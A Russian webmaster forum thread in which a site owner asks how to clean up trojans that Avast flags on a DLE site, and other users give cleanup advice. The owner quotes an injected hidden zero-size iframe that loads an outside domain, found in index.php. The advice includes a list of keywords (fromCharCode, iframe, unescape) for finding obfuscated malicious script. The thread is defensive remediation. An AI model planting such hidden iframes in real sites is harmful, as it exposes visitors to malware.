- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Помогите советом. Как удалить вирусы на сайте замеченные Авастом. Дело в том, что как правило этот Антивирус ложно срабатывает и только он ругается на многих сайтах. Этот случай и у меня. Пытался добавить сайт в партерку Тизернета, а саппорт проверяет Авастом на вирусы, и не принимает мой сайт. Скажу что остальные антивирусы не ругаются.
Подскажите, какой прогой зачистить эту проблему на хостинге.
Аваст ругается на трояны тут:
http://имя сайта/Default/images/
http://имя сайта/templates/Default/images/dw_12.gif
http://имя сайта/unp94263572
посмотрите в исходном коде страницы лишний код, обычно в самом низу кода появляется код с набором символов, его удалить и все, можно проверить пути куда указывает антивирус
обычно начинается с <iframe>
Только сегодня ручками правил один сайтик. Всё грузилось во фреймах, поменял пароль от фтп, жду вот - проблема не в первый раз уже, только пароль мне менять запрещали, снобы, блин.
У кого проблемы стучите в асю помогу.
Спасибо всем!
Вот такую пакость я нашел в конце кода index.php
<iframe src="http://tosto-vik.ru/index.php" width="0" height="0" style="display:none;"></iframe>
Однако удаление этого кода не дало результатов, поставил специально Аваст для поиска вирусов на сайте, все ругается на {gzip}, сайт на ДЛЕ, как найти еще можно остатки вредоносного кода? Наверно в шаблонах где то зарылся. И как искать его в файлах по имени домена, поиск в ПС не дал результатов...
Если ифрэймовский код везде одинаковый:
1. Меняете доступ к фтп.
2. Сливаете весь сайт на машину.
3. Ставите себе NotePad ++
4. Открываете в NotePad все возможные .php и .html файлы.
5. Жмякаете Ctrl+H (Заменить)
6. В строке "Что искать:" вбиваете ифрэймовский код, с строке "Заменить на:" пробел, после чего нажимаете: "Заменить во всех открытых документах" и смотрите на результат.
http://имя сайта/templates/Default/images/dw_12.gif
http://имя сайта/unp94263572
Судя по всему у вас не только iframe, но и трояны под видом gif напиханы и со случайными названиями. Это тоже проходили.
Чистил разные сайты от вирей раз 30 уже, если не больше. На всякий случай сделал статейку недавно: ищем и удаляем вирусы с сайта.
Если что, могу помочь удалить.
1. Делайте дамп сайта.
2. Скачивайте, проверяйте антивирей. Троянов он чистит. (Кстати свой компьютер защитить и проверить на вирусы нужно в обязательном порядке! Для этого есть достаточно полезных бесплатных утилиток, например, AVZ!)
3. Затем уже просматривайте шаблоны на наличие iframe и всевозможных обфускаций (маскировок) ;)
4. Заливайте изменённые файлы обратно на сайт.
5. htacces тоже проверьте, было дело недавно, в него редиректы пихали на сайты с вирями.
6. Про смену паролей уже сказали, не забудьте! И не храните фтп пароли вбитыми в фтп-клиентах!!!!!!!!
6. В строке "Что искать:" вбиваете ифрэймовский код, с строке "Заменить на:" пробел, после чего нажимаете: "Заменить во всех открытых документах" и смотрите на результат
часто проходит, когда повтыкали iframe в чистом виде. Только нужно совсем удалять вредоносный код, а не заменять его на "пробел"! Могут сессии перестать работать, если вдруг вывод пробела окажется до заголовков.
Бывают ситуации, когда в каждом заражённом файле свой javascript, тут помогает либо регулярное выражение, либо вообще только ручное удаление (дабы не удалить попадающие под шаблон полезные данные). И хорошо, что хотя бы найти все заражённые (подозрительные) файлы через поиск действительно можно! Нужно только выявить повторяющиеся участки кода, по которым через поиск найти все подозрительные файлы. И визуально просмотреть, действительно ли там вирь или просто совпадение.
Пока я за все встречи с вирями на сайтах встречал вот такие вхождения в них:
fromCharCode
iframe
unescape
Поиском прогоните свой сайт по каждому ключу, и проверьте визуально все найденный файлы!
Разумеется, вхождение этих ключей, не говорит о том, что в файле обязательно вирус!
Всем спасибо, разобрался. Немного истории о этой проблеме.
Произошло это еще на хостинге advanta/org. У меня тогда тоже стоял аваст и при заходе на свой сайт обнаружил вирус. Написал в саппорт хостера, на что они мне ответили, что аваст часто без надобности паникует, поверил им. И забыл Потом поменял хостинг и жил благополучно пока не нужно было вступать в партнеру. А там при модерации сайта указали на вирус и естественно отклонили мой ресурс. Пол дня потратил на поиск вредоносного кода, и скажу что все Ваши советы были полезны, а причина была банальна, зашифрованный код кликадера вызывал не довольства аваста и систем проверки сайта на вирусы. В итоге я пересмотрю сотрудничество с попапами и кликандерами.
Всем еще раз спасибо!
P/s А аваст и правда оказался крутым антивирусом, ни Каспер ни Нод не замечали..